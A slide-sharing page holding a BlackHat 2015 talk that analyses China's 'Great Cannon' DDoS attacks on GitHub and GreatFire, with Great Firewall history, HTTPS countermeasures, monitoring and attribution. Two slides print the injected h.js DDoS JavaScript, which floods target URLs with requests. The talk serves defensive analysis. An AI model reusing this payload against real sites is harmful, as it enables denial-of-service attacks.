Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesThousandEyes
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupCatarinaPereira64715
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...Product School
 
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...QADay
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsPaul Groth
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsVlad Stirbu
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...Product School
 

Recently uploaded (20)

Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
UiPath New York Community Day in-person event
UiPath New York Community Day in-person eventUiPath New York Community Day in-person event
UiPath New York Community Day in-person event
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...
КАТЕРИНА АБЗЯТОВА «Ефективне планування тестування ключові аспекти та практ...
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIs
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 

Bringing a Cannon to a Knife Fight

  • 1. Bringing a Cannon to a Knife Fight Deciphering China’s offensive Cyber-Weapon Adam Kozy & Johannes Gilger - BlackHat USA 2015
  • 2. Adam Kozy Security Researcher China enthusiast Intro: About Us Johannes Gilger Security Researcher HTTPS enthusiast ;) You don’t have a malware problem, you have an adversary problem! ™ CrowdStrike Inc. Next-Generation Endpoint Protection
  • 3. Outline ◦ Intro ◦ The Great Cannon incident ◦ A short history of the Great Firewall (GFW) ◦ Aftermath of the Great Cannon Attacks ◦ Possible Countermeasures ◦ Attribution ◦ Predictions 3
  • 5. The Great Cannon We’re seeing a lot of action... 1 5
  • 7. The attack on GitHub 7
  • 8. GreatFire: Censorship monitor 8 Tracking of blocked keywords & censorship circumvention tools
  • 9. GreatFire uses Collateral Freedom 9 Idea: Economic cost of blocking GitHub / Cloudfront prohibitive
  • 10. Chinese activity in Cyberspace Jan 18 - Jan 23 2013: GitHub blocked Jan 25 2013: Petition on GFW contributors Jan 26 2013: TLS MiTM against GitHub Jun 14 - 15 2013: DDoS attacks against HK Pop Vote Aug 28 2014: TLS MiTM against Google (CERNET) Oct 1 2014: TLS MiTM against Yahoo Oct 20 2014: TLS MiTM against iCloud Jan 9 2015: DNS Poisoning redirects begin Jan 19 2015: TLS MiTM against outlook.com Mar 16 2015: WSJ Article Mar 3 - Apr 7 2015: Great Cannon attacks Jul 7 2015: Draft Cyber Sovereignty law published 10
  • 11. A short history of the GFW Censorship and Crowd-Control in China 2 11
  • 12. Inception of the GFW - 1987 - “Across the Great Wall, we can reach every corner of the world.” - 1990 - Top-level domain .cn registered - 1994 - First high-speed commercial line Beijing to Shanghai - CANET (CAS, TKU, PKU) & CHINANET (CN Telecom) - 1997 - CNNIC founding - April 1999 - Falun Gong Demonstration - June 1999 - Ministry of Information & Industry (MII) creates “The Center” 12
  • 13. It’s a trap... - Golden Shield Project (GSP) - Propaganda vs. Security - GSP at provincial level - Managed by MPS - GFW: Bottle-neck ALL the traffic! - GSP more expensive, GFW better researchers - Later complementary 13
  • 14. Choke points: Landing sites at the first three National Level Nodes 14 Source: PCCW Global
  • 15. The Center 15 National Computer Network and Information Security Management Center (国家计算机网络与信息安全管理中心)
  • 16. The Center 16 - 1999: created under MII (now: MIIT) - Offices: Beijing, Shanghai, Guangzhou & Provincial - 2001: Establishment of CNCERT/CC - Several awards and government funds related to 863 plan - 2002 - Project 005 & web content filtering - Today: Still active, reporting to MIIT
  • 17. 17 A Wild FANG BINXING Appears! The “Father” of the GFW 1984-1989: Harbin Institute of Tech. (HIT) 1999: Deputy Chief Engineer, Center 2001: Deputy Director, Center - Also named “Outstanding individual” and given “special allowances” 2002-2006: Director, Center 2007-2013: President of BUPT 2008: Elected to 11th NPC 2013: Retired (Health-related) Present: Devoted to research, likely remains on several councils "I'm not interested in reading messy information like some of that anti-government stuff." -方滨兴
  • 18. Influential Figures Yun Xiaochun 云晓春 1999-2002: Deputy Director of HIT Information Security Research Center 2002: S&T National award for work on Project 005 2008-2012: Deputy Director CNCERT/CC - Believed to have taken over as Director of The Center after Fang May 2015: Inducted into China Academy of Engineering - listed as current Center Director - Also currently chairs several high-level CN Internet committees Li Jianhua 李建华 2000-Present: SJTU Professor & current Dean of SISE program 2001: Lead for S219 Project (GSP) 2003: Award for Network Media Regulatory Information System 2004: Award for XXX - Papers with Fang and Yun - Technical expert to NSB & Shanghai security bureau - Papers with Unit 61398 - Chairs several other high-level committees and working groups 18
  • 19. Aftermath How the Great Cannon works 3 19
  • 20. Great Cannon: Timeline 20Source: Google Safe Browsing Mar 3 - 5 Testing, with request limits Mar 14 - 17 Targeting of CloudFront Mar 18 - 25 More CloudFront hosts Mar 26 - end GitHub targeting, obfuscation Idea: JavaScript-based DDoS by injecting code into high-volume websites (Baidu, etc) which will request and overwhelm resources at the target.
  • 21. Great Cannon: HTTP Man-in-the-middle 21Source: Citizen Lab
  • 22. Locating the attacker - Citizenlab: cannon_traceroute.py - GC active on AS4837 and AS4808 - China Unicom Infrastructure - Two IPv4 hops after entry into China - Same hops as the Great Firewall - Shares same side-channels - Distinct system & capabilities - Exact location: “Does it matter?” 22
  • 23. Great Cannon: Established facts 23Source: Citizen Lab - Injects malicious JavaScript - Targets by destination IP address - Probabilistic targeting - Acts on the first data packet - Acts even without TCP SYN - Will act on incorrect HTTP requests - Only targeted international users
  • 24. The payload Malicious JavaScript - A closer look 24
  • 25. h.js - The injected JavaScript document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min. js'></script>"); !window.jQuery && document.write("<script src='http://code.jquery. com/jquery-latest.js'></script>"); startime = new Date().getTime(); var count = 0; function unixtime() { var dt = new Date(); var ux = Date.UTC(dt.getFullYear(), dt.getMonth(), dt.getDay(), dt.getHours(), dt.getMinutes(), dt.getSeconds()) / 1000; return ux; } url_array = new Array("https://d117ucqx7my6vj.cloudfront.net", ...) NUM = url_array.length; function r_send2() { var x = unixtime() % NUM; var url = url_array[x]; get(url); } function r_send(ping) { setTimeout("r_send2()", ping); } setTimeout("r_send2()", 2000); 25
  • 26. h.js - The injected JavaScript function get(myurl) { var ping; $.ajax({ url: myurl + "?" + unixtime(), dataType: "text", timeout: 10000, cache: true, beforeSend: function() { requestTime = new Date().getTime(); }, complete: function() { responseTime = new Date().getTime(); ping = Math.floor(responseTime - requestTime); if (responseTime - startime < 300000) { r_send(ping); count = count + 1; } } }); } 26
  • 27. Exhibit B: h.js (injected) Short code snippet, still some indicators: - Incoherent variable naming - Needless and buggy timestamp generation - Complicated function definitions - Leftover code fragments (count) - Reliance on jQuery - Improvement during campaign (p,a,c,k,e,d) Bottom line: Sloppy, Copy & Paste code 27
  • 28. Copy & Paste: jQuery ping, found at multiple locations (including GitHub) 28
  • 29. So? It’s only JavaScript, right? - Browsing without JavaScript: Not realistic - Many websites relying on external ads - Manual unblocking of JavaScript not feasible - What is malicious behaviour for JavaScript? 29
  • 30. JavaScript - Individual Risks - Persistent Strategic Web Compromise (SWC) - Frameworks already exist (Scanbox, BeEF, etc.) - Easy user identification: Evercookie, Panopticlick - Drive-by-exploitation still a topic in 2015 - Recent examples: Flash & Java 0-days - Great Cannon: Easier than Man-on-the-side - Pure JavaScript attack vectors - WebRTC to get the real host IP (goodbye TOR) - Cross-Site Request Forgery to attack internal devices 30
  • 32. Countermeasures: In a nutshell HTTPS E2E confidentiality Integrity Protection HSTS HTTP Strict Transport Security HSTS Preload List Cert Pinning HSTS Preload List HTTP Header Monitoring Looking out for injections Resource activity analysis Detection Detecting attacks against your infrastructure Response Putting pressure on service providers 32
  • 33. HTTPS & China Website Description HTTPS Mixed HTTPS 301 HSTS Baidu Search Engine QQ Instant Messenger - Taobao / Alipay eCommerce Sina Weibo Twitter - TMall eBay hao123 Miscellaneous - Sohu Online TV - 360 Browser / Apps - RenRen Facebook - Amazon.cn Amazon ;) 33
  • 34. HTTPS & USA Website Description HTTPS Mixed HTTPS 301 HSTS Google Search Engine Bing Search Engine eBay eCommerce - Twitter Short messaging Amazon eCommerce Yahoo Search Engine Youtube Video website Dropbox Cloud storage - Facebook Facebook Outlook.com Web Mail 34 Also see: EFF SSL survey
  • 35. HTTPS & China - Few incentives to adopt HTTPS - Convenient public reason - Baidu will not index HTTPS sites - HSTS List: 6 obscure CN sites - Currently: No CN Root CA in browsers - CNNIC CA removed by Chrome / Firefox - Although: Reinstatement likely 35
  • 36. HTTPS - What you can do - TLS has never been easier to deploy - www.istlsfastyet.com - Free, automatic CA: Let’s Encrypt - HTTP 2.0 will require TLS - Consider HSTS & preloading - HTTP Public Key Pinning Extension - Protects against intermittent MiTM - Violations can be reported automatically 36 Bottom-line: Threat from rogue CA can be reduced, no reason not to use TLS!
  • 37. Monitoring Question: How could you watch out for an attack like this? Static monitoring of JavaScript is not going to cut it! - JavaScript resources change frequently - Have to be reviewed for malicious intent Monitoring dynamic behaviour looks more promising. - How does the website “behave”? - Solution: Build DOM and execute JavaScript - Different approaches (PhantomJS) possible 37
  • 38. Monitoring: Requirements This is the level of information we want - Details on resource requests & response - JavaScript execution & errors - Believable User Agent, Headers, Requests - Stable and secure execution environment - Retrieval of resource content Basically: An instrumented web-browser 38
  • 39. Monitoring: Approach Google Chrome Inspector - Inspector uses Remote Debugging Protocol - Start Chrome with --remote-debugging-port=9222 - WebSocket JSON API, NodeJS module exists What does it offer? - Details on resource requests & response: ✔ - JavaScript execution & errors: ✔ - Believable User Agent: ✔ (it’s Chrome alright) - Stable and secure: ✔ and ✔ (use a VM) - Resource content: ✔ 39
  • 40. Monitoring: Setup - Frequent and distributed browsing of sites - Use TOR / VPS / VPN / Proxies for different exits - Store relevant metadata and JavaScript content - Create call-graph of domains - Annotate with third-party information - But: What do you monitor? How do you alert? Bottom line: Monitoring is no substitute for proper transport security. 40
  • 43. Consolidation & Organization of CN Cyber 43 - Consolidation puts Xi Jinping and Lu Wei at the top of the decision making process - Shows plenty of crossover and working groups that mix civilian and military groups - Several expert working groups are staffed by some of the original GFW contributors - Suggests collaboration as there are few organizations approved to carry out offensive operations abroad (PLA, MSS, MPS)
  • 44. Possible contributors Li and Fang as part of 863 committee on with 3PLA 1st Bureau (Unit 61786), MSS 13th Bureau (S&T), and MIIT members 44
  • 45. Possible contributors Fang Binxing (l) and Li Jianhua at 973 project conference (2014) 45
  • 47. Will we see the GC again? - Will we see the Great Cannon being used in the exact same way? - At what point will there be blowback? - Luckily, this was an early and unsophisticated attack, but how could it further evolve? - Will the Great Cannon be used in a more targeted and covert fashion? - If so: What role might the CNNIC CA play? - Might control over the Great Cannon be given to departments tasked with targeted attacks? 47
  • 48. Who might be hit next? The usual suspects: - Taiwanese General Election (January 2016) - Hong Kong Popular Vote - South China Sea territorial disputes Also: Targeted attacks against domestic entities. 48
  • 49. Thanks for your attention! Adam Kozy & Johannes Gilger - BlackHat USA 2015 49
  • 50. 50 References & Suggested Reading - The Citizen Lab - China’s Great Cannon, April 10 2015 - GreatFire.org - Chinese Authorities compromise millions, March 31 2015 - Open Letter to Lu Wei, 26 January 2015 - Google - JavaScript-based DDoS Attack, 24 April 2015 - OpenNet Initiative - Internet Filtering in China, 2004 - Gov.cn - Establishment of National Informatization Group, 23 December 1999 Slides and Pictograms by SlidesCarnival.com
  • 51. 51